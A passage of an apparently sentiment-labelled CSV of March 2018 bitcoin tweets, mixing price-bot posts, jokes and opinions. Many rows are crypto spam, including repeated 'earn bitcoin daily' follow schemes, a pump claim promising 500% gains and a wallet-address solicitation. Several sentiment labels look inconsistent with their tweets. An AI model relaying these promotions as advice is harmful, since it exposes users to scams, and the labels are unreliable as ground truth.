AskRate: 0.00001119 #Bittrex #HMQ $HMQ #Humaniq #altcoin #crypto #bitcoin + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 03:20:03 +0000 2018,"1 bitcoin = $8440.05 / 6850.366€ +1 bitcoin-cash = $970.851 / 787.991€ +1 ethereum = $517.001 / 419.624€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 03:20:48 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:20:58 +0000 2018,Don't let the #Binance #FUD today distract you. #Bitcoin $BTC will bounce back.,0.0 +Fri Mar 23 03:21:17 +0000 2018,@syd_viciously Bitcoin was created by the CIA?,0.0 +Fri Mar 23 03:21:44 +0000 2018,Terabyte blocks - 50 txns a day for 10 billion people. Bitcoin can scale on chain. No layer 2 needed.,0.0 +Fri Mar 23 03:22:36 +0000 2018,"@RichardHeartWin However, bitcoin is going way lower regardless..",0.0 +Fri Mar 23 03:23:12 +0000 2018,"Whenever I contemplate whether or not to sell Bitcoin, I think of the ""Goodbye moon man"" song from Rick and Morty.",0.0 +Fri Mar 23 03:23:49 +0000 2018,Bitcoin is barely even fun anymore. $XBT BTC,1.0 +Fri Mar 23 03:24:21 +0000 2018,@CoinStructive #shirtgate Hey @ellypriZeMaN we need you more than ever. ~Bitcoin Belle 🌷,1.0 +Fri Mar 23 03:24:42 +0000 2018,@LandlordRescue I’m inventing a better bitcoin so should be good to go!,1.0 +Fri Mar 23 03:25:29 +0000 2018,"@LoganPaul watch out for the death cross in ur bitcoin investment ,look it up check it out protect ur money",0.0 +Fri Mar 23 03:25:56 +0000 2018,"Dow Jones going down. +Bitcoin was supposed to shield. +Fucking suits- leave us! + +$BTC #crypto #haiku",-1.0 +Fri Mar 23 03:26:04 +0000 2018,our uber driver has his business card on the dash and it says “bitcoin miner” as his job title,0.0 +Fri Mar 23 03:26:23 +0000 2018,@ProfFaustus Bitcoin is not a philosophy...... BCH is not Bitcoin.,0.0 +Fri Mar 23 03:26:24 +0000 2018,@itsmelissabrown remember how early they were on writing about bitcoin??? nuts in retrospect,1.0 +Fri Mar 23 03:26:32 +0000 2018,"@JakeNTech New options: +1. Water Cooled Laptop, WetCoin™! +2. Two Computa, Two BitCoin!",1.0 +Fri Mar 23 03:27:05 +0000 2018,All in on Diet Bitcoin. Escobars brother guarantees profit lol,1.0 +Fri Mar 23 03:27:06 +0000 2018,"50k tokens reserved for private investors + +#Ethereum #ZOMBI #ZOMBIcoin #Bitcoin #ICO",0.0 +Fri Mar 23 03:27:09 +0000 2018,"The Thrive Labs Team is launching a revolutionary Premium Decentralized Advertising Marketplace. +#thrive #ico #ethereum #bitcoin",0.0 +Fri Mar 23 03:27:11 +0000 2018,"I hate ween people exploit things and ruin the fun for everyone. First Youtube, now bitcoin/cryptos 😧😧",-1.0 +Fri Mar 23 03:27:33 +0000 2018,I see all the Bitcoin ppl stopped talkin 😭,0.0 +Fri Mar 23 03:28:55 +0000 2018,wat if unified Korea becomes the next cuba & disrupts global power um Bitcoin n stuff,0.0 +Fri Mar 23 03:29:16 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:30:02 +0000 2018,"Bitcoin:$8431.5 +Ethereum:$515.604 +Bitcoin Cash:$966.799 +Litecoin:$158.548 +Ripple:$0.631444 +IOTA:$1.26867",0.0 +Fri Mar 23 03:30:03 +0000 2018,"1 bitcoin = $8431.5 / 6843.426€ +1 bitcoin-cash = $966.799 / 784.702€ +1 ethereum = $515.604 / 418.489€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 03:30:03 +0000 2018,One Bitcoin now worth $8413.81@bitstamp. High $9055.330. Low $8342.000. Market Cap $142.481 Billion #bitcoin,1.0 +Fri Mar 23 03:30:03 +0000 2018,One Bitcoin now worth $8413.81@bitstamp. High $9055.330. Low $8342.000. Market Cap $142.481 Billion #bitcoin,1.0 +Fri Mar 23 03:30:10 +0000 2018,@welovefaucet I have the same problem in both We Love Bitcoin and Play Bitcoin.,1.0 +Fri Mar 23 03:30:22 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 03:30:26 +0000 2018,#SUB Price is 0.00004617 (-0.00000073) #BTC / 0.385999 (-0.00771) #USD. Market rank is 116. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 03:30:27 +0000 2018,Bitcoin>>>>>,0.0 +Fri Mar 23 03:30:27 +0000 2018,#EOS Price is 0.00078017 (-0.00000340) #BTC / 6.52226 (-0.06538) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 03:30:28 +0000 2018,#XEM Price is 0.00003301 (-0.00000028) #BTC / 0.275969 (-0.00347) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 03:30:29 +0000 2018,#ADA Price is 0.00002258 (-0.00000009) #BTC / 0.188787 (-0.00178) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 03:30:29 +0000 2018,#DASH Price is 0.0481372 (+0.00093950) #BTC / 402.431 (+5.62700) #USD. Market rank is 11. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 03:30:45 +0000 2018,This couple loves bitcoin so much that they decided to have a bitcoin themed wedding. Most of their guests gave them bitcoin as a gift!,1.0 +Fri Mar 23 03:31:15 +0000 2018,"Hello humans, #Bitcoin is currently around $8428.55 as of Thu Mar 22 22:31:11 CDT 2018",0.0 +Fri Mar 23 03:31:23 +0000 2018,Bitcoin value: $8430.81,0.0 +Fri Mar 23 03:31:45 +0000 2018,@Altcoinbuzzio Bitcoin still. I've been stockpiling and putting it in my bot to make daily scalping trades,0.0 +Fri Mar 23 03:31:49 +0000 2018,@lister_lester He wants to buy the bitcoin dip. : ),1.0 +Fri Mar 23 03:32:03 +0000 2018,@Alfredo_THC make bitcoin and the dow go back up,0.0 +Fri Mar 23 03:32:32 +0000 2018,"The short way was to help, Google and Facebook went for the money. Plan B, just go through you🔥 + +#bitcoin",0.0 +Fri Mar 23 03:32:36 +0000 2018,@CNBC Would be nice to see an after Pic when bitcoin crashes,1.0 +Fri Mar 23 03:32:57 +0000 2018,"Fri Mar 23 04:32:12 2018 (15:49) +USD : 8416.59 +Wght: 0.42 +Blk#: 514758 +Size: 736.0 KB +TXs: 1658 +Pool: 75 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 03:33:09 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:33:26 +0000 2018,New #bitcoin block 00000000000000000004d1d76f3a8931d87ad736d36fd62c733e05cf56d9274e mined at height 514758.,1.0 +Fri Mar 23 03:33:42 +0000 2018,So @Ania_Nimbla you like #Bitcoin & #Crypto Cool 👍🏻 Great to connect Ania much appreciated,1.0 +Fri Mar 23 03:34:00 +0000 2018,"@afaqshah @PhilakoneCrypto Wishing ill upon bitcoin, rude",-1.0 +Fri Mar 23 03:34:35 +0000 2018,#bitcoin buy now 8387 good price for enter,1.0 +Fri Mar 23 03:34:50 +0000 2018,@EstherKuKu Then redeem your points for Bitcoin and boom goes the dynamite!,0.0 +Fri Mar 23 03:36:02 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:36:13 +0000 2018,@CNBC How much are they worth in bitcoin?,1.0 +Fri Mar 23 03:36:19 +0000 2018,@Ginkgo_tree_Kr @rogerkver @Falkvinge Bitcoin is not a philosophy. BCH is not Bitcoin.,0.0 +Fri Mar 23 03:36:27 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:36:48 +0000 2018,I really look forward to bitcoin being large enough that these whales can't fuck with the price so much.,1.0 +Fri Mar 23 03:36:53 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:37:15 +0000 2018,Bitcoin 4k by July 🤑🤑🤑🤑,0.0 +Fri Mar 23 03:38:08 +0000 2018,Lil Bitcoin #newgenerationrapnames,0.0 +Fri Mar 23 03:38:12 +0000 2018,"$ELEC Pump detected, in 5 days we will see + 500% on this baby! Very hot inside news are coming! #bitcoin #altcoin #eth $eth $xmr $btc",1.0 +Fri Mar 23 03:38:22 +0000 2018,@lopp @coindesk Better bitcoin resource:,1.0 +Fri Mar 23 03:38:42 +0000 2018,@bitstein By this logic what is work?? Trading??? Every diehard hodler I know works to better bitcoin for free.,1.0 +Fri Mar 23 03:38:54 +0000 2018,Since /r/buttcoin is actually one of the oldest bitcoin subs around we were in the top 3 I think for a few years,1.0 +Fri Mar 23 03:39:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:39:25 +0000 2018,"BTC,ETH,ETC,LTC,BCH,MONA +Please send someone virtual currency  +#Bitcoin #VirtualCurrency",0.0 +Fri Mar 23 03:39:46 +0000 2018,@bitcoinyuri @badger_coin Looks nice...makes me wanna buy some $BTC #Bitcoin !,0.0 +Fri Mar 23 03:39:53 +0000 2018,"@CNBC (2932331 follows) +This couple loves bitcoin so much that they decided to have a bitcoin themed wedding. Most of their guests gave...",1.0 +Fri Mar 23 03:39:54 +0000 2018,@lopp Better bitcoin resource:,1.0 +Fri Mar 23 03:40:04 +0000 2018,"1 bitcoin = $8441.65 / 6851.665€ +1 bitcoin-cash = $970.165 / 787.434€ +1 ethereum = $515.2 / 418.162€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 03:40:32 +0000 2018,"""We have elected to put our money and faith in a mathematical framework that is free of politics and human error."" Tyler Winklevoss #bitcoin",1.0 +Fri Mar 23 03:40:45 +0000 2018,@SommerRay do you like bitcoin?,0.0 +Fri Mar 23 03:40:46 +0000 2018,"It's hard to make a good TA in ALTS if the market is being moved by $btc. So, let's keep following The King. $btcusd $crypto #bitcoin",1.0 +Fri Mar 23 03:41:14 +0000 2018,@nachdermas buy bitcoin,0.0 +Fri Mar 23 03:41:21 +0000 2018,:( :( ....[Bitcoin performance assessment (-0.18%)] #bitcoin,-1.0 +Fri Mar 23 03:42:03 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 03:42:20 +0000 2018,@NoahRobertson01 glad i never bought into the bitcoin hype,1.0 +Fri Mar 23 03:43:00 +0000 2018,"Ever wanted to experiment with bitcoin? Send some to this address, yo:1BFaVmv91jmxSZDkiNedw1kt56m4X5bpRm",0.0 +Fri Mar 23 03:43:09 +0000 2018,#Bitcoin is all of the beautiful poetry you read but failed to understand.,1.0 +Fri Mar 23 03:43:16 +0000 2018,@thealexwolfe @LockedOnKnicks You'd better run that ish like a bitcoin mining facility. It's like 0.00000:p000o.O0013 cents per stream... 😭,1.0 +Fri Mar 23 03:43:16 +0000 2018,"💯💯💯 great dealEarn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:43:39 +0000 2018,@C1TY_0F_FL1NT @chadxenu @BigTiddiePolice You'll have to pay me 1 bitcoin,0.0 +Fri Mar 23 03:43:41 +0000 2018,"#bitcoin next 1 hour high low range potential + +Low 8343 +High 8623",1.0 +Fri Mar 23 03:44:14 +0000 2018,@crypt0snews Bitcoin can be wiped out if the authorities prove it as a counterfeit like a 3 dollar fake bill....,-1.0 +Fri Mar 23 03:44:16 +0000 2018,I really just sent 300 to the wrong bitcoin address.. wow.. fml,-1.0 +Fri Mar 23 03:44:36 +0000 2018,"@DJSweetBrush @ericgeller Unless it's money laundering through Bitcoin. Could be anything, though lots of big names involved.",0.0 +Fri Mar 23 03:44:51 +0000 2018,"DO-NOT short Bitcoin, you will get crushed + +Sub 0.050 Eth/Btc is possible",-1.0 +Fri Mar 23 03:44:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:45:05 +0000 2018,IMHO bitcoin is the worst!! 🌙,-1.0 +Fri Mar 23 03:45:15 +0000 2018,Earn bitcoin disini,0.0 +Fri Mar 23 03:45:15 +0000 2018,"#Moneto is a loan service, through which users can get real money on the security of Bitcoin and almost instantly.",1.0 +Fri Mar 23 03:45:47 +0000 2018,@MichaelMyers @Bitcoin @blockchain This feels like a reach.,0.0 +Fri Mar 23 03:46:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:47:11 +0000 2018,"#MONETO will provide an opportunity to take a loan on the security of Bitcoin immediately, comfortably and reliably as possible.",1.0 +Fri Mar 23 03:47:13 +0000 2018,Might be risky. But it is time to go long on #xbtusd. Go #bitcoin,-1.0 +Fri Mar 23 03:47:18 +0000 2018,Including bitcoin/altcoins,0.0 +Fri Mar 23 03:47:27 +0000 2018,"""Old man yells at Bitcoin"" is exactly the same pattern as: + +""The Church yells at Darwin for claiming that man was not created by god""",1.0 +Fri Mar 23 03:47:30 +0000 2018,@Snowden Post more bitcoin FUD please.,1.0 +Fri Mar 23 03:47:32 +0000 2018,"What does ""altcoin"" mean? $crypto #bitcoin",-1.0 +Fri Mar 23 03:47:47 +0000 2018,"old: ""man, i wish i had bought bitcoin back then!"" +new: ""man, i wish i had sold bitcoin back then!""",1.0 +Fri Mar 23 03:47:48 +0000 2018,@BradyDale @coindesk @Snowden @blockstack @WolfieZhao I also think this as one of the biggest endorsements for Bitcoin indirectly,0.0 +Fri Mar 23 03:47:54 +0000 2018,"#Moneto will provide an opportunity to take a loan on the security of Bitcoin as quickly, conveniently and safely as possible.",1.0 +Fri Mar 23 03:48:23 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:48:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:48:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:49:13 +0000 2018,"Optimal tx fee: 0 satoshi per byte. +BTC : $8406 / €6816 / £5956 @ Block 514758. +Market Cap: 145.52B USD. #Bitcoin #Market",0.0 +Fri Mar 23 03:49:17 +0000 2018,@QuestForTori A Smart app that lets you mine for bitcoin while you order dominos,1.0 +Fri Mar 23 03:49:47 +0000 2018,@Sicarious_ A trading tool for more Bitcoin.,1.0 +Fri Mar 23 03:50:02 +0000 2018,A poet without love were a physical and metaphysical impossibility. #JohnKeats #bitcoin,1.0 +Fri Mar 23 03:50:03 +0000 2018,"1 bitcoin = $8458.96 / 6865.714€ +1 bitcoin-cash = $973.827 / 790.406€ +1 ethereum = $517.184 / 419.773€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 03:50:13 +0000 2018,"@ninthcompanion This is literally my thoughts exactly + +but nah its a way to mine bitcoin",1.0 +Fri Mar 23 03:50:15 +0000 2018,"#MONETO is a loan service, allowing users will be able to receive real money on the security of Bitcoin and almost immediately.",1.0 +Fri Mar 23 03:50:20 +0000 2018,@CandyHeartsBand fun fact: u can sell them on the black market in exchange for bitcoin,1.0 +Fri Mar 23 03:50:23 +0000 2018,@joenatividad Uh oh. Hope you don’t have to buy a new one. Damn bitcoin miners ruin everything,1.0 +Fri Mar 23 03:50:59 +0000 2018,"What % of the time does fundamental ""FUD"" show up to justify a technical dump? #Bitcoin #Ethereum #cryptocurrency",0.0 +Fri Mar 23 03:51:08 +0000 2018,@DonCryptoLife @CatoshiK @rogerkver Roger Ver was not associated with the creation of Bitcoin Cash,0.0 +Fri Mar 23 03:51:24 +0000 2018,Bitcoin value: $8420.77,0.0 +Fri Mar 23 03:51:42 +0000 2018,@PhilakoneCrypto You're not trading it for Bitcoin now? 🤑,0.0 +Fri Mar 23 03:52:06 +0000 2018,"Join the #FlightToSafety #NoTariffs + +#bitcoin #litecoin #bitcoincash #investing #fintech #stockmarkets",0.0 +Fri Mar 23 03:52:18 +0000 2018,@MaddowBlog @MSNBC right no the city of atlanta computer system has been Hacked and their asking for 51000 in bitcoin,1.0 +Fri Mar 23 03:52:24 +0000 2018,crazy thought: that guy who bought bitcoin at $0.08 and sold it at $0.30 made more money than anyone who bought in December,-1.0 +Fri Mar 23 03:52:40 +0000 2018,@witsureisquick No bitcoin in existence can amount to the worth my followers are.,1.0 +Fri Mar 23 03:52:55 +0000 2018,"@shillycrypto Present: ""I wish I had sold Bitcoin right now!""",1.0 +Fri Mar 23 03:53:16 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:53:20 +0000 2018,@LeNuitRenard @LordRapt0rJesus @Dunnestar @ProfFaustus Do you hodl bitcoin?,0.0 +Fri Mar 23 03:53:32 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:53:52 +0000 2018,"@MarkYusko Good, bad, indifferent, you’re the only serious investor I know as bullish on bitcoin",-1.0 +Fri Mar 23 03:53:57 +0000 2018,"Dutch Court Finds Bitcoin A Legitimate “Transferable Value”: A Dutch court ruled BTC a “transferable value”, which…",0.0 +Fri Mar 23 03:53:59 +0000 2018,"Fri Mar 23 04:53:03 2018 (20:51) +USD : 8393.36 +Wght: 0.42 +Blk#: 514759 +Size: 1062.6 KB +TXs: 2146 +Pool: 96 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 03:54:01 +0000 2018,@NotJustin11 Honestly have no clue how to get bitcoin 😂,1.0 +Fri Mar 23 03:54:13 +0000 2018,look on youtube for the purchase of crypto#FLOGmall#blockchain#bitcoin#btc#etherum#ico,0.0 +Fri Mar 23 03:54:19 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:54:27 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:54:29 +0000 2018,"Fri Mar 23 04:54:12 2018 (1:09) +USD : 8393.36 +Wght: 0.42 +Blk#: 514760 +Size: 64.4 KB +TXs: 129 +Pool: 39 (0.0 MB) +@dellisny +#bitcoin",0.0 +Fri Mar 23 03:54:32 +0000 2018,@sashandiggers @aantonop @farantzos LN is presumably a 100% trusted intermediary between Me and the Bitcoin Ledger,0.0 +Fri Mar 23 03:54:37 +0000 2018,@CRInvestor @ErikSTownsend You know what he thinks about bitcoin right?,1.0 +Fri Mar 23 03:54:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:54:42 +0000 2018,New #bitcoin block 000000000000000000110c6088b447cd0e9eca66d321b19218027aa5a2fba391 mined at height 514759.,1.0 +Fri Mar 23 03:54:46 +0000 2018,New #bitcoin block 00000000000000000021c74f60ebbe8111e38b6a6d14b91d918ec68a9cab17f1 mined at height 514760.,1.0 +Fri Mar 23 03:54:48 +0000 2018,New #bitcoin block 000000000000000000414d2134cf429c8a8ee667dbe1ff76a32ea809068114aa mined at height 514761.,1.0 +Fri Mar 23 03:55:00 +0000 2018,"Fri Mar 23 04:54:29 2018 (0:17) +USD : 8394.66 +Wght: 0.42 +Blk#: 514761 +Size: 9.9 KB +TXs: 26 +Pool: 75 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 03:55:00 +0000 2018,"@WeTrustPlatform @el33th4xor Thanks! We are indeed the first #bitcoin nonprofit, est. 2013 🙌🏾",1.0 +Fri Mar 23 03:55:16 +0000 2018,"4661dbbb251658a2a2e9422ddd5eb7a1e189fb2532812454edb443b07e55beb9/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 03:56:21 +0000 2018,#Ilovebitcoin because there are no legal issues with using #bitcoin everywhere,-1.0 +Fri Mar 23 03:56:35 +0000 2018,@emcgillivray @ncweaver @random_walker Bitcoin is not equal to blockchain,0.0 +Fri Mar 23 03:57:07 +0000 2018,"@_Kevin_Pham Although were #AdamSmith around today he might call it an #InvisibleVirtualHand. + +#cryptocurrency #blockchain #bitcoin $BTC",0.0 +Fri Mar 23 03:57:18 +0000 2018,"semangat mengumpulkan bitcoin, Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:57:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:58:08 +0000 2018,I feel like most of the stock drops are because of amerixan owned bitcoin owners though,1.0 +Fri Mar 23 03:58:20 +0000 2018,Current price of Bitcoin is $8419.00 #Bitcoin #Bithound,0.0 +Fri Mar 23 03:58:57 +0000 2018,I think because of the law in america....it is definetly hurting american bitcoin owners compared to in eu vs korea,0.0 +Fri Mar 23 03:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30399.00000000 | BITCOIN(BLCHAIN) R$27878.6590054 | LITECOIN(MCDTBC) R$576.80000000,0.0 +Fri Mar 23 03:59:09 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 03:59:14 +0000 2018,We need a bounce here or these next few weeks are gonna be ugly... $BTCUSD #bitcoin,-1.0 +Fri Mar 23 03:59:57 +0000 2018,Which will launch first? $crypto #bitcoin,1.0 +Fri Mar 23 04:00:00 +0000 2018,"Bad news: Bitcoin on the decline. +Current Rate: 8413.21 USD = 1 BTC",-1.0 +Fri Mar 23 04:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,444.11, market cap of $142,996,569,692 (44.33%), and 24 hr vol. of $5,470,960,000 (37.57%)",0.0 +Fri Mar 23 04:00:00 +0000 2018,"Mar 22, 2018 09:00PM #Bitcoin Price: +USD 8671.55 | EUR 7036.48 | JPY 924287.55",0.0 +Fri Mar 23 04:00:01 +0000 2018,"Bitcoin - BTC +Price: $8,442.21 +Change in 1h: -0.08% +Market cap: $142,964,183,134.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 04:00:02 +0000 2018,"BTC-NXT AskRate: 0.00001621 #Bittrex #NXT $NXT #NXT #altcoin #crypto #bitcoin + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 04:00:02 +0000 2018,"#USD #bitcoin Index: + 11894 satoshi’s = $1 + #silver: 0.002 btc/oz",0.0 +Fri Mar 23 04:00:02 +0000 2018,Current BTC Dominance: 44.33% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 04:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,413.21, EUR 6,824.42",-1.0 +Fri Mar 23 04:00:02 +0000 2018,"Bitcoin:$8442.21 +Ethereum:$516.396 +Bitcoin Cash:$971.068 +Litecoin:$159.128 +Ripple:$0.634595 +IOTA:$1.27617",0.0 +Fri Mar 23 04:00:03 +0000 2018,"1 bitcoin = $8444.11 / 6853.661€ +1 bitcoin-cash = $971.068 / 788.167€ +1 ethereum = $516.395 / 419.132€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:00:04 +0000 2018,2018-03-23 04:00 UTC Bitcoin Price: 8407.91 USD,0.0 +Fri Mar 23 04:00:07 +0000 2018,Google will Create its Own Blockchain in the Future: Report #crypto #bitcoin #trading,1.0 +Fri Mar 23 04:00:13 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8407.31/$8418.06 #Bitstamp +$8407.77/$8413.40 #Kraken +⇢$-10.29/$6.09 +$8360.00/$8444.03 #Coinbase +⇢$-58.06/$36.72",0.0 +Fri Mar 23 04:00:14 +0000 2018,Top 6 BTC/USD Exchange Orderbooks: Resistance til $8700:$27.5M; Support til $8200:$36.7M $BTC $BTCUSD #bitcoin #orderbook #markets #trading,1.0 +Fri Mar 23 04:00:28 +0000 2018,#XEM Price is 0.00003316 (+0.00000015) #BTC / 0.278311 (+0.00234) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 04:00:30 +0000 2018,"BTC hourly update +$8418.78 | -0.0029%📉 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 04:00:30 +0000 2018,#DASH Price is 0.048257 (+0.00011980) #BTC / 404.992 (+2.56100) #USD. Market rank is 11. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 04:00:31 +0000 2018,#SUB Price is 0.00004594 (-0.00000023) #BTC / 0.385555 (-0.00044) #USD. Market rank is 117. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 04:00:32 +0000 2018,#EOS Price is 0.00078344 (+0.00000327) #BTC / 6.57491 (+0.05265) #USD. Market rank is 6. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 04:00:33 +0000 2018,#ADA Price is 0.00002250 (-0.00000008) #BTC / 0.18882 (+0.00003) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 04:00:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:00:40 +0000 2018,@harto So Russian hackers can use it's processor to mine bitcoin.,0.0 +Fri Mar 23 04:00:50 +0000 2018,sse in medium for doubling for deposit#FLOGmall#blockchaun#bitcoin#btc#etherum#ico,0.0 +Fri Mar 23 04:00:52 +0000 2018,"#Bitcoin $8,411.65 v #BitcoinCash $966.57 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 13:00JST",0.0 +Fri Mar 23 04:01:02 +0000 2018,Current price of Bitcoin is $8418.82 $BTC,0.0 +Fri Mar 23 04:01:21 +0000 2018,"@PapixSatoshi @nanocurrency If Bitcoin we're to crash and burn right now, every crypto would become worthless. Be careful what you wish for",-1.0 +Fri Mar 23 04:01:36 +0000 2018,"Current Bitcoin price (USD): $8,413.21. Changed -299.68 USD since yesterday. Data last updated 15 minutes ago. #bitcoin #bitcoinprice",0.0 +Fri Mar 23 04:01:43 +0000 2018,#Binance Lists WanCoin ( $WAN ) #bitcoin #Bittrex #ethereum,-1.0 +Fri Mar 23 04:01:49 +0000 2018,#Bitcoin Price 8418.82 USD via Chain,0.0 +Fri Mar 23 04:02:11 +0000 2018,@CryptoGat When Bitcoin on Binance? It use a pumpy to prevent the dumpy you know 😝,0.0 +Fri Mar 23 04:02:34 +0000 2018,"Bitcoin percentage of market cap: 44.33 % +#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance",0.0 +Fri Mar 23 04:02:41 +0000 2018,Bitcoin 8418.82 $,0.0 +Fri Mar 23 04:02:44 +0000 2018,@CryptoGat When Bitcoin on Binance? It could use a pumpy to prevent the dumpy you know 😝,0.0 +Fri Mar 23 04:02:45 +0000 2018,The current price of a #bitcoin is $8418.82. Have a nice day!,1.0 +Fri Mar 23 04:02:51 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK!!",1.0 +Fri Mar 23 04:03:12 +0000 2018,Current price of #Bitcoin is $8418.82 via Chain #BTCUSD #cryptocurrencies #blockchain,0.0 +Fri Mar 23 04:03:12 +0000 2018,Current price of Bitcoin is $8418.82.,0.0 +Fri Mar 23 04:03:18 +0000 2018,Current price of Bitcoin is $8418.82,0.0 +Fri Mar 23 04:03:19 +0000 2018,"@RT_com Hey dope, it’s Costco. + +It’s Bitcoin. + +It’s Instant Pot.",0.0 +Fri Mar 23 04:03:26 +0000 2018,Current price of #Bitcoin is $8418.82,0.0 +Fri Mar 23 04:04:08 +0000 2018,"Bitcoin $BTC | $8,420 (-6.82%)",0.0 +Fri Mar 23 04:04:12 +0000 2018,Current price of Bitcoin is $8418.82 - please RT #BTCUSD,0.0 +Fri Mar 23 04:04:18 +0000 2018,@taidi_ji How could Bitcoin absorb the value of a split window Corvette?,0.0 +Fri Mar 23 04:04:20 +0000 2018,Current price of Bitcoin is $8418.82 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 04:04:29 +0000 2018,BTC $8444.11 Down -$0.76 -0.01% in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 04:05:02 +0000 2018,"Sometimes you have to fight your friends harder than you do your enemies🔥 + +#bitcoin",-1.0 +Fri Mar 23 04:05:10 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:05:57 +0000 2018,Bitcoin and all is cool but have you invested in a person that turned out totally worthless.,-1.0 +Fri Mar 23 04:05:57 +0000 2018,Let's go for the last week see in medium#FLOGmall#blockchain#bitcoin#btc,0.0 +Fri Mar 23 04:06:43 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:07:00 +0000 2018,@donlydacius @trumpthat_pussy @vj239 How do you feel about bitcoin,0.0 +Fri Mar 23 04:07:31 +0000 2018,@krassenstein Bitcoin???????,0.0 +Fri Mar 23 04:07:36 +0000 2018,@smsportsguy @JoeFloccari @KariVanHorn Bitcoin is worth 10x what it was just a few years ago. I wouldn't call that tanking.,1.0 +Fri Mar 23 04:07:45 +0000 2018,@SilviuMajor everyone follow @MyBit_DApp. The next bitcoin.,0.0 +Fri Mar 23 04:07:58 +0000 2018,@drumchode @hashflare and if u bought 10k worth of bitcoin in december ud lose money too,1.0 